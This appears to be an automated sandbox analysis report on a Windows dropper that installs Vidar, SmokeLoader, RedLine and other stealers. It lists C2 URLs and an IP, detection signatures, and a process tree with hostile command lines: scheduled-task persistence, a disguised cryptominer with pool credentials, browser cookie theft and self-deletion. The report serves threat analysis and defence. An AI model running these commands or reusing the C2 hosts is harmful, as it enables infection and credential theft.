Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    177s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-08-2021 23:12

General

  • Target

    8 (15).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Modifies WinLogon for persistence 2 TTPs 9 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 13 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 23 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 42 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 52 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1068
      • C:\Users\Admin\AppData\Roaming\rghrrrv
        C:\Users\Admin\AppData\Roaming\rghrrrv
        2⤵
          PID:1300
        • C:\Users\Admin\AppData\Roaming\hjhrrrv
          C:\Users\Admin\AppData\Roaming\hjhrrrv
          2⤵
            PID:2388
            • C:\Users\Admin\AppData\Roaming\hjhrrrv
              C:\Users\Admin\AppData\Roaming\hjhrrrv
              3⤵
                PID:7540
            • C:\Users\Admin\AppData\Roaming\rghrrrv
              C:\Users\Admin\AppData\Roaming\rghrrrv
              2⤵
                PID:224
              • C:\Users\Admin\AppData\Roaming\hjhrrrv
                C:\Users\Admin\AppData\Roaming\hjhrrrv
                2⤵
                  PID:5984
                • C:\Users\Admin\AppData\Roaming\rghrrrv
                  C:\Users\Admin\AppData\Roaming\rghrrrv
                  2⤵
                    PID:4620
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1128
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2548
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                        PID:2664
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2568
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                        1⤵
                          PID:2688
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                          1⤵
                            PID:1816
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                            1⤵
                              PID:2980
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                              1⤵
                                PID:1380
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                1⤵
                                  PID:1352
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                  1⤵
                                    PID:1188
                                  • C:\Users\Admin\AppData\Local\Temp\8 (15).exe
                                    "C:\Users\Admin\AppData\Local\Temp\8 (15).exe"
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:808
                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2284
                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\setup_install.exe
                                        "C:\Users\Admin\AppData\Local\Temp\7zSCE821994\setup_install.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:3116
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_1.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:920
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_1.exe
                                            sonia_1.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:2192
                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_1.exe" -a
                                              6⤵
                                              • Executes dropped EXE
                                              PID:3280
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1324
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_2.exe
                                            sonia_2.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            PID:2176
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1176
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_3.exe
                                            sonia_3.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:1136
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 928
                                              6⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:3508
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2308
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_4.exe
                                            sonia_4.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3156
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2148
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE821994\sonia_5.exe
                                            sonia_5.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:1328
                                            • C:\Users\Admin\Documents\4CUYr2SPYxKcgIn72WHZ80jo.exe
                                              "C:\Users\Admin\Documents\4CUYr2SPYxKcgIn72WHZ80jo.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4708
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                "C:\Windows\System32\dllhost.exe"
                                                7⤵
                                                  PID:764
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c cmd < Continua.pptx
                                                  7⤵
                                                    PID:5060
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd
                                                      8⤵
                                                        PID:2120
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr /V /R "^hrVmJwToKxUzJbufzBCieeoCYvJHZAdLamrEFkwMUIyxRybgpVUzcLJlUzAjsjoltowlzBJiAQhzXOKSZcbrGWfHQSKjKOxHAVdJthUHjMSFbfhyIHhWOtDiSxxBRbbMcF$" Palpito.pptx
                                                          9⤵
                                                            PID:1416
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                            Dir.exe.com p
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:4304
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                              10⤵
                                                              • Executes dropped EXE
                                                              PID:5496
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dir.exe.com p
                                                                11⤵
                                                                • Executes dropped EXE
                                                                PID:5692
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping localhost -n 30
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:5408
                                                    • C:\Users\Admin\Documents\IdJtKYKSUj6THcxuL3xw4H9x.exe
                                                      "C:\Users\Admin\Documents\IdJtKYKSUj6THcxuL3xw4H9x.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4696
                                                      • C:\Users\Admin\Documents\IdJtKYKSUj6THcxuL3xw4H9x.exe
                                                        C:\Users\Admin\Documents\IdJtKYKSUj6THcxuL3xw4H9x.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2124
                                                    • C:\Users\Admin\Documents\kA5sqsaqtptKWFo_LMiQlh1C.exe
                                                      "C:\Users\Admin\Documents\kA5sqsaqtptKWFo_LMiQlh1C.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4684
                                                      • C:\Users\Admin\AppData\Local\Temp\gajrneum.hmg.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\gajrneum.hmg.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5088
                                                        • C:\Users\Admin\AppData\Roaming\HashModule.exe
                                                          "C:\Users\Admin\AppData\Roaming\HashModule.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5724
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                            9⤵
                                                              PID:184
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                10⤵
                                                                • Creates scheduled task(s)
                                                                PID:5816
                                                            • C:\Users\Admin\AppData\Roaming\Internalprosecc.exe
                                                              "C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"
                                                              9⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:5164
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"' & exit
                                                                10⤵
                                                                  PID:7032
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Internalprosecc" /tr '"C:\Users\Admin\AppData\Roaming\Internalprosecc.exe"'
                                                                    11⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:6308
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                  10⤵
                                                                    PID:6180
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6031730 --pass=nixwaree --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                                                                    10⤵
                                                                      PID:5204
                                                                • C:\Users\Admin\AppData\Roaming\Intilizate.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Intilizate.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Adds Run key to start application
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:5892
                                                                • C:\Users\Admin\AppData\Roaming\AkrienPremium.exe
                                                                  "C:\Users\Admin\AppData\Roaming\AkrienPremium.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5956
                                                                • C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WindscribeLauncher.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Checks processor information in registry
                                                                  PID:5944
                                                                • C:\Users\Admin\AppData\Roaming\WindowsInternal.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5936
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"' & exit
                                                                    9⤵
                                                                      PID:2292
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:4512
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsInternal" /tr '"C:\Users\Admin\AppData\Roaming\WindowsInternal.exe"'
                                                                        10⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:4420
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:5168
                                                                  • C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe
                                                                    "C:\Users\Admin\AppData\Roaming\SystemPropertiesAdvance.exe"
                                                                    8⤵
                                                                    • Modifies WinLogon for persistence
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Program Files directory
                                                                    • Drops file in Windows directory
                                                                    PID:5928
                                                              • C:\Users\Admin\Documents\IaKebIFhLgUWXPHOZt8eX64g.exe
                                                                "C:\Users\Admin\Documents\IaKebIFhLgUWXPHOZt8eX64g.exe"
                                                                6⤵
                                                                  PID:4792
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5300
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:6072
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4228
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:5768
                                                                    • C:\Users\Admin\Documents\3m_ejFzAyfjpIaTszH8xDnZT.exe
                                                                      "C:\Users\Admin\Documents\3m_ejFzAyfjpIaTszH8xDnZT.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4764
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                        7⤵
                                                                          PID:4212
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im chrome.exe
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:5288
                                                                      • C:\Users\Admin\Documents\9qSM0y_kuxMFfk9HBNezHs11.exe
                                                                        "C:\Users\Admin\Documents\9qSM0y_kuxMFfk9HBNezHs11.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4936
                                                                        • C:\Users\Admin\Documents\9qSM0y_kuxMFfk9HBNezHs11.exe
                                                                          "C:\Users\Admin\Documents\9qSM0y_kuxMFfk9HBNezHs11.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:4200
                                                                      • C:\Users\Admin\Documents\m65O623kYHr1HAg51LywJF9s.exe
                                                                        "C:\Users\Admin\Documents\m65O623kYHr1HAg51LywJF9s.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4916
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "m65O623kYHr1HAg51LywJF9s.exe" /f & erase "C:\Users\Admin\Documents\m65O623kYHr1HAg51LywJF9s.exe" & exit
                                                                          7⤵
                                                                            PID:3396
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im "m65O623kYHr1HAg51LywJF9s.exe" /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:4196
                                                                        • C:\Users\Admin\Documents\e3Z68plXvgj07YE8TCGxYgkM.exe
                                                                          "C:\Users\Admin\Documents\e3Z68plXvgj07YE8TCGxYgkM.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4860
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 476
                                                                            7⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Loads dropped DLL
                                                                            • Program crash
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1016
                                                                        • C:\Users\Admin\Documents\FzyMtjEJwBmTmQzA0taUB5Hy.exe
                                                                          "C:\Users\Admin\Documents\FzyMtjEJwBmTmQzA0taUB5Hy.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4252
                                                                          • C:\Users\Admin\AppData\Roaming\7706795.exe
                                                                            "C:\Users\Admin\AppData\Roaming\7706795.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4924
                                                                          • C:\Users\Admin\AppData\Roaming\4339024.exe
                                                                            "C:\Users\Admin\AppData\Roaming\4339024.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4748
                                                                        • C:\Users\Admin\Documents\lALpDq3hNLc4fiWZ3xT3jXKH.exe
                                                                          "C:\Users\Admin\Documents\lALpDq3hNLc4fiWZ3xT3jXKH.exe"
                                                                          6⤵
                                                                            PID:4512
                                                                            • C:\Users\Admin\AppData\Roaming\1940125.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1940125.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:3392
                                                                            • C:\Users\Admin\AppData\Roaming\7741537.exe
                                                                              "C:\Users\Admin\AppData\Roaming\7741537.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4416
                                                                          • C:\Users\Admin\Documents\sSAZK0OrPdkVb8DpjPV3AJuO.exe
                                                                            "C:\Users\Admin\Documents\sSAZK0OrPdkVb8DpjPV3AJuO.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4772
                                                                            • C:\Users\Admin\Documents\sSAZK0OrPdkVb8DpjPV3AJuO.exe
                                                                              "C:\Users\Admin\Documents\sSAZK0OrPdkVb8DpjPV3AJuO.exe" -q
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5056
                                                                          • C:\Users\Admin\Documents\41gUs0VAinZNmh0qkNgV4JiX.exe
                                                                            "C:\Users\Admin\Documents\41gUs0VAinZNmh0qkNgV4JiX.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:1600
                                                                          • C:\Users\Admin\Documents\EhLgM3NVPRw94GdPfGyRNisV.exe
                                                                            "C:\Users\Admin\Documents\EhLgM3NVPRw94GdPfGyRNisV.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:1196
                                                                            • C:\Users\Admin\Documents\EhLgM3NVPRw94GdPfGyRNisV.exe
                                                                              "C:\Users\Admin\Documents\EhLgM3NVPRw94GdPfGyRNisV.exe"
                                                                              7⤵
                                                                                PID:4244
                                                                            • C:\Users\Admin\Documents\fXozzS6RXoy24PuWh8F8qtiF.exe
                                                                              "C:\Users\Admin\Documents\fXozzS6RXoy24PuWh8F8qtiF.exe"
                                                                              6⤵
                                                                                PID:788
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im fXozzS6RXoy24PuWh8F8qtiF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\fXozzS6RXoy24PuWh8F8qtiF.exe" & del C:\ProgramData\*.dll & exit
                                                                                  7⤵
                                                                                    PID:5356
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im fXozzS6RXoy24PuWh8F8qtiF.exe /f
                                                                                      8⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5904
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /t 6
                                                                                      8⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:4852
                                                                                • C:\Users\Admin\Documents\BuwYRD7BRffQHqRq1efM3M5Z.exe
                                                                                  "C:\Users\Admin\Documents\BuwYRD7BRffQHqRq1efM3M5Z.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:2200
                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops startup file
                                                                                    PID:2708
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6092
                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                      8⤵
                                                                                        PID:4396
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
